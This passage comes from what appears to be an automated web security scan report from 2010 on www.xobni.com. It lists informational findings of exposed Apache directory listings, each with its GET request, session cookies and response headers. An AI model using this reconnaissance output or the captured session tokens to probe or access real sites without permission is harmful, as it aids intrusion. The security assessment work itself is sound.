Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3468
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure</title>
</head>
<body>
<h1>Index of /images/structure</h1>
<table><tr><th><img src="/icons/
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.31. http://www.xobni.com/images/structure/ambient1/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/ambient1/

Request

GET /images/structure/ambient1/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1814
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/ambient1</title>
</head>
<body>
<h1>Index of /images/structure/ambient1</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.32. http://www.xobni.com/images/structure/amblue/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/amblue/

Request

GET /images/structure/amblue/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/amblue</title>
</head>
<body>
<h1>Index of /images/structure/amblue</h1>
<table><tr><th><im
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.33. http://www.xobni.com/images/structure/download/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/download/

Request

GET /images/structure/download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1034
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/download</title>
</head>
<body>
<h1>Index of /images/structure/download</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.34. http://www.xobni.com/images/structure/global/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/global/

Request

GET /images/structure/global/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:19 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 80204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/global</title>
</head>
<body>
<h1>Index of /images/structure/global</h1>
<table><tr><th><im
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.35. http://www.xobni.com/images/structure/global/v1_8s/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/global/v1_8s/

Request

GET /images/structure/global/v1_8s/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/global/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:20 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3447
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/global/v1_8s</title>
</head>
<body>
<h1>Index of /images/structure/global/v1_8s</h1>
<table
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/global/">Parent Directory</a>
...[SNIP]...

13.36. http://www.xobni.com/images/structure/homepageapr10/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/homepageapr10/

Request

GET /images/structure/homepageapr10/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:22 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4476
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepageapr10</title>
</head>
<body>
<h1>Index of /images/structure/homepageapr10</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.37. http://www.xobni.com/images/structure/homepageaug10/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/homepageaug10/

Request

GET /images/structure/homepageaug10/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:22 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4546
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepageaug10</title>
</head>
<body>
<h1>Index of /images/structure/homepageaug10</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.38. http://www.xobni.com/images/structure/homepagejul10/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/homepagejul10/

Request

GET /images/structure/homepagejul10/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:23 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2922
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepagejul10</title>
</head>
<body>
<h1>Index of /images/structure/homepagejul10</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.39. http://www.xobni.com/images/structure/homepagemar10/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/homepagemar10/

Request

GET /images/structure/homepagemar10/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2646
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepagemar10</title>
</head>
<body>
<h1>Index of /images/structure/homepagemar10</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.40. http://www.xobni.com/images/structure/homepagenov09/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/homepagenov09/

Request

GET /images/structure/homepagenov09/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:24 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2410
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/homepagenov09</title>
</head>
<body>
<h1>Index of /images/structure/homepagenov09</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.41. http://www.xobni.com/images/structure/linkedin/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/linkedin/

Request

GET /images/structure/linkedin/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1092
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/linkedin</title>
</head>
<body>
<h1>Index of /images/structure/linkedin</h1>
<table><tr><th
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.42. http://www.xobni.com/images/structure/partners_amblue/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/partners_amblue/

Request

GET /images/structure/partners_amblue/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:25 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3458
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/partners_amblue</title>
</head>
<body>
<h1>Index of /images/structure/partners_amblue</h1>

...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.43. http://www.xobni.com/images/structure/partners_gray/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/partners_gray/

Request

GET /images/structure/partners_gray/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:26 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2042
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/partners_gray</title>
</head>
<body>
<h1>Index of /images/structure/partners_gray</h1>
<tab
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.44. http://www.xobni.com/images/structure/press/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/press/

Request

GET /images/structure/press/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 894
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/press</title>
</head>
<body>
<h1>Index of /images/structure/press</h1>
<table><tr><th><img
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.45. http://www.xobni.com/images/structure/skype/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/skype/

Request

GET /images/structure/skype/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 866
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/skype</title>
</head>
<body>
<h1>Index of /images/structure/skype</h1>
<table><tr><th><img
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.46. http://www.xobni.com/images/structure/videoinline/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/structure/videoinline/

Request

GET /images/structure/videoinline/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/images/structure/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:28 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 2670
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/structure/videoinline</title>
</head>
<body>
<h1>Index of /images/structure/videoinline</h1>
<table><
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/structure/">Parent Directory</a>
...[SNIP]...

13.47. http://www.xobni.com/images/team/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/team/

Request

GET /images/team/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 4308
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/team</title>
</head>
<body>
<h1>Index of /images/team</h1>
<table><tr><th><img src="/icons/blank.gif"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.48. http://www.xobni.com/images/welcome_screen/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /images/welcome_screen/

Request

GET /images/welcome_screen/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:38 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 840
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /images/welcome_screen</title>
</head>
<body>
<h1>Index of /images/welcome_screen</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/images/">Parent Directory</a>
...[SNIP]...

13.49. http://www.xobni.com/javascripts/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /javascripts/

Request

GET /javascripts/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:12 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 3631
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /javascripts</title>
</head>
<body>
<h1>Index of /javascripts</h1>
<table><tr><th><img src="/icons/blank.gif"
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/">Parent Directory</a>
...[SNIP]...

13.50. http://www.xobni.com/javascripts/swfobject/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /javascripts/swfobject/

Request

GET /javascripts/swfobject/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:10:07 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 837
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /javascripts/swfobject</title>
</head>
<body>
<h1>Index of /javascripts/swfobject</h1>
<table><tr><th><img sr
...[SNIP]...
<th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a>
...[SNIP]...
<td><a href="/javascripts/">Parent Directory</a>
